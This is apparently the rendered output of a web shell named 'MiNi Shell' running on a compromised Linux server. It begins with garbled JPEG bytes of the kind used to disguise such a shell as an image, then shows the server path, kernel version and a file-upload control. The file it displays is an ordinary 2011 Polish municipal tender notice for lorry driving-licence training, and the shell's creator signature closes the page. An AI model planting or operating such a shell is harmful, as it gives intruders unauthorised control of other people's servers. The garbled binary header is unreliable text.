JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110318/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110318/48816-N-2011.html

<p class="kh_header"><b>Wola Krzysztoporska: Przeprowadzenie szkolenia z zakresu prawa jazdy kat. C z obsługą burt samowyładowczych</b><br>
<b>Numer ogłoszenia: 48816 - 2011; data zamieszczenia: 18.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wola Krzysztoporska , ul. Kościuszki 5/11, 97-371 Wola Krzysztoporska, woj. łódzkie, tel. (044) 61-63-961, faks (044) 61-63-960.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wola-krzysztoporska.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie szkolenia z zakresu prawa jazdy kat. C z obsługą burt samowyładowczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest: zorganizowanie i przeprowadzenie szkolenia dla grupy 10 osób,                     w zakresie:
a) prawo jazdy kat. C - zgodnie z programem szkolenia zgodnym z Rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskania  uprawnień przez kierujących pojazdami instruktorów i egzaminatorów ( Dz. U. z 2005 r. Nr 217, poz. 1834, z późniejszymi zmianami), 
b) obsługi burt samowyładowczych  wg  następującego programu:
1/ ogólne wiadomości o dźwignicach (1godz.)
2/ wiadomości o DT (2godz.)
3/ działanie burt samowyładowczych (2godz.)
4/ eksploatacja burt samowyładowczych (5godz.)
5/ BHP (2godz.)
6/ zajęcia praktyczne (4godz)
RAZEM: 16 godz. (12 godz. zajęć teoretycznych oraz 4 godz. zajęć praktycznych)
Uczestnikowi, który ukończy kurs z wynikiem pozytywnym wydane będzie przez Wykonawcę   zaświadczenie na podstawie §6 Rozporządzenia Ministra Edukacji i Nauki z dnia 3 lutego 2006 r.                  w sprawie uzyskiwania i uzupełnienia przez osoby  dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych  w formach pozaszkolnych (Dz.U. 06.Nr 31.poz 216 ze zmianami).
Wykonawca w ramach usługi zobowiązany jest  również do:   
1) zapewnienia uczestnikom szkolenia  ciepłych posiłków na wszystkich zajęciach grupowych,                                                          
2) zapewnienia uczestnikom szkolenia przeprowadzenia badań lekarskich, 
3) zapewnienie uczestnikom szkolenia przeprowadzenia badań psychologicznych,
4) pokrycia kosztu pierwszego zewnętrznego egzaminu 
oraz wykonania pozostałych obowiązków Wykonawcy opisanych we wzorze umowy stanowiącym załącznik   nr 8 do SIWZ

Zamawiający wymaga  przeprowadzenia szkolenia w Piotrkowie Trybunalskim.

Kod CPV: 80500000-9 Usługi szkoleniowe
Kod CPV: 80411200-0  usługi szkół nauki jazdy

2. Zamawiający nie przewiduje udzielenia zaliczek na poczet wykonania zamówienia. 
        
3. Zamawiający nie dopuszcza możliwości składania ofert częściowych oraz wariantowych.  

4. Przedmiotem niniejszego postępowania nie jest zawarcie umowy ramowej. 
5. Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających do wysokości 50 % wartości zamówienia.
6.  Zamawiający nie przewiduje przy wyborze oferty zastosowania aukcji elektronicznej.
7. Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów. 
8. Informacja na temat możliwości powierzenia przez wykonawcę wykonania części lub całości zamówienia podwykonawcom:
Wykonawca może powierzyć wykonanie części lub całości niniejszego zamówienia podwykonawcom. W takim przypadku zobowiązany jest do wykazania w formularzu ofertowym części zamówienia, której wykonanie zamierza powierzyć podwykonawcom.
9. Wymagania stawiane Wykonawcy:
9.1 Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi                                      i jakościowymi opisanymi dla przedmiotu zamówienia.  
9.2   Wymagana jest należyta staranność przy realizacji zobowiązań umowy,  
9.3   Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez zamawiającego z ustanowionym przedstawicielem wykonawcy.  
9.4 Określenie przez Wykonawcę telefonów kontaktowych i numerów fax. oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia.  
 9.5 Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających do wysokości 50 % wartości zamówienia, zakres zgodny z przedmiotem zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.41.12.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać, że zgodnie z treścią art. 22 ust 1 ustawy o promocji zatrudnienia i instytucjach rynku pracy (DZ.U.08 Nr 69 poz. 415 z późniejszymi zmianami) jest wpisany do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej.

W tym celu zobowiązany jest do oferty załączyć oświadczenie o spełnieniu warunku dotyczącego art. 22 ust. 1 pkt. 1) ustawy Pzp potwierdzające , że zgodnie z treścią art. 20 ust 1 ustawy o promocji zatrudnienia   i instytucjach rynku pracy (DZ.U.08 Nr 69 poz. 415 z późniejszymi zmianami) Wykonawca  jest wpisany do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej - załącznika  nr 4 do SIWZ. 

Ocena spełnienia tego warunku dokonywana będzie o treść ww. dokumentu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) Wykonawca zobowiązany jest wykazać, że będzie dysponował w czasie realizacji niniejszego zamówienia odpowiednim taborem samochodowym dla prowadzenia szkolenia tj.:  min. jednym pojazdem  wyprodukowanym nie dawniej niż w roku 2007 właściwym do przeprowadzenia szkolenia z zakresu prawa jazdy kat C., z ważnym przeglądem technicznym i polisą ubezpieczeniową OC, 
b) Wykonawca zobowiązany jest wykazać, że dysponuje placem manewrowym,     oraz salą wykładową do przeprowadzenia zajęć teoretycznych w miejscowości Piotrków Tryb.                                                                                                        o parametrach  określonych Rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskania  uprawnień przez kierujących pojazdami instruktorów i egzaminatorów ( Dz. U. z 2005 r. Nr 217, poz. 1834, z późniejszymi zmianami),
W tym celu zobowiązany jest do oferty załączyć wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami - załącznik nr 7 do SIWZ 
Wykonawcy posiadający do przeprowadzenia szkolenia własne pojazdy, oraz własny plac manewrowy poświadczają ten fakt w rubryce podstawa dysponowania zapisem sprzęt własny własny plac manewrowy, w przypadku korzystania z pojazdów, oraz placu manewrowego innych podmiotów należy wpisać tytuł prawny do dysponowania np. najem, dzierżawa.  W wykazie wykonawca wykazuje również salę dydaktyczną położoną na ternie miasta Piotrkowa Tryb. Do wykazu Wykonawcy zobowiązani są dołączyć kserokopie dowodów rejestracyjnych pojazdów, polis OC pojazdów oraz zaświadczeń  o przystosowaniu pojazdu do nauki jazdy

Ocena spełnienia tego warunku dokonywana będzie o treść ww. dokumentu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać, że dysponuje osobami zdolnymi do wykonania zamówienia tj. min. 1 instruktorem posiadającym odpowiednie kwalifikacje zawodowe do prowadzenia szkolenia kierowców. 

W tym celu zobowiązany jest do oferty załączyć: 
a) wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług  wraz z informacjami na temat ich kwalifikacji zawodowych, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami  - załącznika  nr 5 do SIWZ  

b)  oświadczenie potwierdzające posiadanie wymaganych uprawnień przez wskazane osoby w zakresie niezbędnym do wykonania zamówienia - załącznik nr 6 do SIWZ. 
 

Ocena spełnienia tego warunku dokonywana będzie o treść ww. dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)  Wzór formularza ofertowego - wypełniony i podpisany przez wykonawcę - załącznik nr 1 do SIWZ 

2) Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień publicznych - załącznik nr 2 do SIWZ 


3) Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.

4) Wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty wymienione w pkt.  III. 4.2 dotyczące tego podmiotu. 

5) Oświadczenie o spełnieniu warunku dotyczącego art. 22 ust. 1 pkt. 1) ustawy Pzp potwierdzające , że zgodnie z treścią art. 20 ust 1 ustawy o promocji zatrudnienia   i instytucjach rynku pracy (DZ.U.08 Nr 69 poz. 415 z późniejszymi zmianami) Wykonawca  jest wpisany do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej - załącznika  nr 4 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Liczba przeszkolonych osób może być mniejsza w przypadku nie zebrania  przez Zamawiającego wystarczającej liczby kandydatów  spełniających warunki udziału w projekcie. W takim przypadku Wykonawca nie może mieć w stosunku do Zamawiającego żadnych roszczeń z powodu nie zrealizowania zamówienia w całości, a rozliczenie odbędzie się na podstawie rzeczywistej liczby przeszkolonych osób oraz ceny jednostkowej za przeszkolenie jednej osoby.
2. Odstąpienie od realizacji części programu szkolenia lub wprowadzenie jakichkolwiek zmian w programie po podpisaniu umowy może nastąpić wyłącznie za zgodą Zamawiającego. Wykonawca  zobowiązuje się do przedstawienia ponownej kalkulacji i proponowanych zmian w formie pisemnej, przy czym zmiany te nie mogą prowadzić do wyższej ceny jednostkowej za szkolenie (ani do obniżenia standardu szkolenia)  niż wynika to  ze złożonej oferty 
3. Zmiana harmonogramu może nastąpić tylko za zgodą Zamawiającego. 
4. Wykonywania szkolenia przy użyciu zasobów wskazanych w ofercie. Zmiana zasobów (pojazdy, sala wykładowa, plac manewrowy, instruktor) może nastąpić na umotywowany wniosek Wykonawcy. Zamawiający wyrazi zgodę na zmianę tylko wtedy, jeżeli wskazane  do wykonywania zamówienia zasoby będą spełniały parametry  wymagane treścią SIWZ.
5. W przypadku wprowadzenia innej stawki podatku VAT na usługi szkoleniowe do ceny szkolenia, doliczony zostanie podatek VAT w wysokości określonej w obowiązujących przepisach. W tym samym zakresie ulegnie zmianie wysokość wynagrodzenia całkowitego za wykonanie umowy.
6. W odniesieniu kalkulacji ceny umownej,  strony ustalają, że :
a) w przypadku zmniejszenia  liczby uczestników (np. rezygnacji, wykluczenia uczestnika lub dokonania zmiany szkolenia przez Uczestnika) 	przed  datą  rozpoczęciu kursu Wykonawcy zostanie wypłacone wynagrodzenie umowne  skalkulowane według rzeczywistej liczby osób rozpoczynających szkolenie (według listy przekazanej przez Wykonawcę).
b)  w przypadku zmniejszenia  liczby uczestników (np. rezygnacji lub wykluczenia uczestnika) po dacie rozpoczęciu szkolenia:
-    za zajęcia teoretyczne zostanie wypłacone w całości wynagrodzenie określone w ofercie, 
- w przypadku zajęć praktycznych indywidualnych określonych w załączniku do umowy wynagrodzenie zostanie wypłacone jedynie za zrealizowaną ilość godzin szkoleniowych  po przedstawieniu szczegółowej kalkulacji kosztów przez  Wykonawcę.
c) następujące składniki wynagrodzenia za usługę szkoleniową: 
- badania lekarskie i psychologiczne, zostaną wypłacone Wykonawcy za rzeczywistą liczbę przeprowadzonych badań, wartość ta może ulec zmniejszeniu w przypadku jeżeli ich wykonanie okaże się zbędne (gdy uczestnik posiada aktualne badania),
- koszt egzaminu zostanie wypłacony Wykonawcy za rzeczywistą liczbę opłaconych egzaminów 
d) składnik wynagrodzenia za usługę szkoleniową: zapewnienie ciepłych posiłków - zostanie wypłacona wykonawcy za rzeczywistą liczbę ciepłych posiłków zapewnionych Uczestnikom Projektu; liczba ta może być mniejsza niż wynikająca z kalkulacji określonej załączniku nr 2 do umowy np. w przypadku rezygnacji ze szkolenia Uczestnika i nie skierowania na to miejsce innej osoby, natomiast wynagrodzenia zostanie wypłacone w całości za zapewnienie posiłku na zajęciach w przypadku kiedy Uczestnik bez uprzedzenia będzie na nich nieobecny.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wola-krzysztoporska.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Wola Krzysztoporska
Ul. Kościuszki 5
97-371 Wola Krzysztoporska.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.03.2011 godzina 12:00, miejsce: Gmina Wola Krzysztoporska
Ul. Kościuszki 5
97-371 Wola Krzysztoporska.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Moja szansa na dobrą pracę współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki na lata  2007-2013:   
Priorytet VI. Rynek pracy otwarty dla wszystkich, Działanie 6.1. Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej  w regionie, Poddziałanie 6.1.1 Wsparcie osób pozostających bez zatrudnienia na regionalnym rynku pracy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com